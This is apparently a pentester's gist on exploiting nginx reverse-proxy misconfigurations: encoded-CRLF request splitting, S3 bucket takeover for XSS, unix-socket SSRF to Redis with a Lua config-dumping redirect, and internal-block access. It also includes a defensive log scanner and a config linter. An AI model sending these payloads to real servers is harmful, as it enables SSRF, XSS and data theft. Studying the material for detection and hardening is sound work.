@cyberheartmi9
Created April 16, 2023 06:47
# PT Reverse Proxy
## Exploiting HTTP Splitting with cloud storage
```nginx
location ~ /docs/([^/]*/[^/]*)? {
    proxy_pass https://bucket.s3.amazonaws.com/docs-website/$1.html;
}
```

```
yourdomain.com/docs/help/contact-us --> https://bucket.s3.amazonaws.com/docs-website/help/contact-us.html
```
### Detect vulnerability
`[^/]*` also matches URL-encoded newlines (`%0d%0a`). When the captured value is substituted into `proxy_pass`, nginx decodes it, so the newlines end up in the request sent upstream.
```http
GET /docs/%20HTTP/1.1%0d%0aHost:non-existing-bucket1%0d%0a%0d%0a HTTP/1.1
Host: yourdomain.com
```
After `proxy_pass` decodes the newlines, the upstream receives:
```http
GET /docs-website/ HTTP/1.1
Host:non-existing-bucket1
.html HTTP/1.0
Host: bucket.s3.amazonaws.com
```
```nginx
location ~ /images([0-9]+)/([^\s]+) {
    proxy_pass https://s3.amazonaws.com/companyname-images$1/$2;
}
```

```
/images1/pwn --> https://s3.amazonaws.com/companyname-images1/pwn
/images2/pwn --> https://s3.amazonaws.com/companyname-images2/pwn
```
### Serve our XSS payload

Steps:

1. Generate an error by providing a number that doesn't exist: `/images1337/` --> error page that exposes the S3 server directory.
2. Create an S3 bucket with the same name and serve a page with the XSS payload: `/images1337/xss.html` --> `https://s3.amazonaws.com/companyname-images1337/xss.html`
## Controlling proxied host
```nginx
location ~ /static/(.*)/(.*) {
    proxy_pass http://$1-example.s3.amazonaws.com/$2;
}
```

```
yourdomain.com/static/js/
yourdomain.com/static/js/app-1555347823-min.js --> http://js-example.s3.amazonaws.com/app-1555347823-min.js
```
This can lead to XSS by serving an XSS page from a bucket under attacker control:
```
yourdomain.com/static/xss/xss.html --> http://xss-example.s3.amazonaws.com/xss.html
```

nginx also accepts a unix socket as the upstream:

```nginx
proxy_pass http://unix:/var/run/backend.sock:/uri
```
[+] Bypass Redis mitigations

Redis drops the connection if a line it receives starts with one of the following:

[*] The line starts with POST
[*] The line starts with Host
```nginx
location ~ /static/(.*)/(.*.js) {
    proxy_pass http://$1-example.s3.amazonaws.com/$2;
}
```

```http
GET /static/unix:%2ftmp%2fmysocket:TEST/app-1555347823-min.js HTTP/1.1
```
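On the defender side, the two probes shown above (the encoded-newline request under "Detect vulnerability" and the `unix:` request here) are visible in the nginx access log, because `$request` is logged exactly as received, percent-encoding included. The following scanner is an added example and not part of the gist: it parses lines in the stock `combined` log_format (an assumption), URL-decodes the path and flags CR/LF, a spliced request line, or the `unix:` pseudo-scheme. The log lines are constructed for the example.

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Stock nginx "combined" log_format (assumed). nginx logs $request as received,
# so percent-encoding is still present in the path field.
LOG_RE = re.compile(
    r'^(?P<addr>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)

# Constructed sample log: two ordinary requests and three probes of the kind shown above.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Apr/2023:06:47:01 +0000] "GET /docs/help/contact-us HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Apr/2023:06:47:05 +0000] "GET /docs/%20HTTP/1.1%0d%0aHost:non-existing-bucket1%0d%0a%0d%0a HTTP/1.1" 404 312 "-" "curl/7.88.1"
203.0.113.7 - - [16/Apr/2023:06:47:09 +0000] "GET /static/unix:%2ftmp%2fmysocket:TEST/app-1555347823-min.js HTTP/1.1" 502 157 "-" "curl/7.88.1"
198.51.100.4 - - [16/Apr/2023:06:47:12 +0000] "GET /static/js/app-1555347823-min.js HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Apr/2023:06:47:15 +0000] "GET /images/%0aHost:example HTTP/1.1" 404 312 "-" "curl/7.88.1"
"""


@dataclass
class Finding:
    line_no: int
    addr: str
    path: str
    kinds: list


def classify_path(raw_path: str) -> list:
    """Return the suspicious properties of one request path (empty list if clean)."""
    decoded = unquote(raw_path)
    kinds = []
    if '\r' in decoded or '\n' in decoded:
        # Encoded newlines that reach proxy_pass split the upstream request.
        kinds.append('crlf-in-path')
    if re.search(r' HTTP/1\.[01]', decoded):
        # A second request line spliced into the path.
        kinds.append('injected-request-line')
    if 'unix:' in decoded.lower():
        # nginx's unix: pseudo-scheme appearing in request data.
        kinds.append('unix-socket-in-path')
    return kinds


def scan_access_log(text: str) -> list:
    """Parse combined-format log lines and return a Finding for each suspicious request."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; a real tool would count these separately
        kinds = classify_path(m.group('path'))
        if kinds:
            findings.append(Finding(line_no, m.group('addr'), m.group('path'), kinds))
    return findings


if __name__ == '__main__':
    for f in scan_access_log(SAMPLE_LOG):
        print(f'line {f.line_no}: {f.addr} {", ".join(f.kinds)}  {f.path}')
```

The checks run on the decoded path rather than the raw one so that `%0a` alone, `%0d%0a` and mixed-case encodings are all caught; `classify_path` can be reused on paths pulled from any other log source.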
## Following redirects
```nginx
location ~ /images(.*) {
    proxy_intercept_errors on;
    proxy_pass http://example.com$1;
    error_page 301 302 307 303 = @handle_redirects;
}

location @handle_redirects {
    set $original_uri $uri;
    set $orig_loc $upstream_http_location;
    proxy_pass $orig_loc;
}
```
Serve a site under attacker control:
```nginx
error_page 404 405 =301 @405;
location @405 {
    try_files /index.php?$args /index.php?$args;
}
```

```php
<?php
header('Location: http://unix:/tmp/redis.sock:\'return (table.concat(redis.call("config","get","*"),"\n").." HTTP/1.1 200 OK\r\n\r\n")\' 1 ', true, 301);
```
## Accessing internal Nginx blocks
[*] By using the X-Accel-Redirect response header, we can make Nginx redirect internally to serve another config block, even ones marked with the internal directive:
```nginx
location /internal_only/ {
    internal;
    root /var/www/html/internal/;
}
```
### Accessing localhost restricted Nginx blocks
[*] By using a hostname with a DNS A pointer to 127.0.0.1, we can make Nginx redirect internally to blocks allowing localhost only:
```nginx
location /localhost_only/ {
    deny all;
    allow 127.0.0.1;
    root /var/www/html/internal/;
}
```
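The misconfigurations collected in these notes share a shape: request-controlled data (a regex capture or an upstream header) is substituted into the `proxy_pass` target. The following linter is an added example, not code from the gist: it walks `location` / `proxy_pass` pairs in an nginx config and flags a capture that admits encoded CR/LF being placed in the upstream path, a variable in the upstream hostname or in the bucket position of a path-style S3 URL, and a `proxy_pass` whose whole target is a variable (the redirect-following block above). The sample config is constructed from the snippets in these notes plus two blocks that should pass; the parser is line-based and assumes one directive per line and no braces inside location regexes.

```python
import re
from dataclasses import dataclass, field

# Constructed nginx config: the patterns discussed in the notes plus two blocks that
# should pass (anchored regex with a restrictive character class; no variables at all).
SAMPLE_CONFIG = r"""
server {
    location ~ /docs/([^/]*/[^/]*)? {
        proxy_pass https://bucket.s3.amazonaws.com/docs-website/$1.html;
    }
    location ~ /images([0-9]+)/([^\s]+) {
        proxy_pass https://s3.amazonaws.com/companyname-images$1/$2;
    }
    location ~ /static/(.*)/(.*) {
        proxy_pass http://$1-example.s3.amazonaws.com/$2;
    }
    location @handle_redirects {
        set $orig_loc $upstream_http_location;
        proxy_pass $orig_loc;
    }
    location ~ ^/assets/([a-z0-9_-]+)\.js$ {
        proxy_pass https://assets.example.invalid/$1.js;
    }
    location /api/ {
        proxy_pass http://backend.internal/;
    }
}
"""

LOCATION_RE = re.compile(r'^location\s+(?P<mod>~\*?|=|\^~)?\s*(?P<pat>\S+)\s*\{')
PROXY_PASS_RE = re.compile(r'^proxy_pass\s+(?P<target>\S+?)\s*;')
# Capture groups in a location regex; non-capturing (?:...) groups are skipped.
CAPTURE_RE = re.compile(r'\((?!\?)([^()]*)\)')
# A capture is "restrictive" when it is one character class of word-ish characters
# (or \d / \w) plus an optional quantifier: it cannot match %0d%0a, ':' or '/'.
RESTRICTIVE_CAPTURE_RE = re.compile(r'^(?:\[[A-Za-z0-9_.\-]+\]|\\[dw])[+*?]?$')


@dataclass
class LocationBlock:
    modifier: str
    pattern: str
    directives: list = field(default_factory=list)


@dataclass
class Finding:
    location: str
    proxy_pass: str
    kind: str
    detail: str


def parse_locations(config: str) -> list:
    """Collect the directives of every location block (one directive per line assumed)."""
    blocks, current, depth = [], None, 0
    for raw in config.splitlines():
        line = raw.strip()
        if current is None:
            m = LOCATION_RE.match(line)
            if m:
                current = LocationBlock(m.group('mod') or '', m.group('pat'))
                depth = 1
            continue
        depth += line.count('{') - line.count('}')
        if depth <= 0:
            blocks.append(current)
            current = None
        else:
            current.directives.append(line)
    return blocks


def split_target(target: str):
    """Split a proxy_pass URL into (host, path); ('', '') when there is no scheme."""
    if '://' not in target:
        return '', ''
    host, sep, path = target.split('://', 1)[1].partition('/')
    return host, sep + path


def analyse_config(config: str) -> list:
    """Return one Finding per risky use of request-controlled data in proxy_pass."""
    findings = []
    for block in parse_locations(config):
        captures = CAPTURE_RE.findall(block.pattern) if block.modifier.startswith('~') else []
        for directive in block.directives:
            m = PROXY_PASS_RE.match(directive)
            if not m:
                continue
            target = m.group('target')
            if target.startswith('$'):
                findings.append(Finding(block.pattern, target, 'target-from-variable',
                                        'whole upstream URL comes from a variable (e.g. upstream Location)'))
                continue
            host, path = split_target(target)
            if '$' in host:
                findings.append(Finding(block.pattern, target, 'variable-in-host',
                                        'request data selects the upstream host'))
            if host == 's3.amazonaws.com' and '$' in path.strip('/').split('/', 1)[0]:
                findings.append(Finding(block.pattern, target, 'variable-in-bucket-name',
                                        'path-style S3 URL: request data selects the bucket'))
            for i, cap in enumerate(captures, start=1):
                if re.search(r'\$%d(?!\d)' % i, path) and not RESTRICTIVE_CAPTURE_RE.match(cap):
                    findings.append(Finding(block.pattern, target, 'unsafe-capture-in-path',
                                            'capture $%d = (%s) admits encoded CR/LF' % (i, cap)))
    return findings


if __name__ == '__main__':
    for f in analyse_config(SAMPLE_CONFIG):
        print(f'{f.kind:24} location {f.location}  ->  {f.proxy_pass}  ({f.detail})')
```

The fix the linter points at is the same in every case: anchor the location regex and restrict each capture to a character class that cannot carry `%0d%0a`, `:` or `/`, and never let a variable choose the upstream host or bucket. The two clean blocks in the sample show that shape and produce no findings.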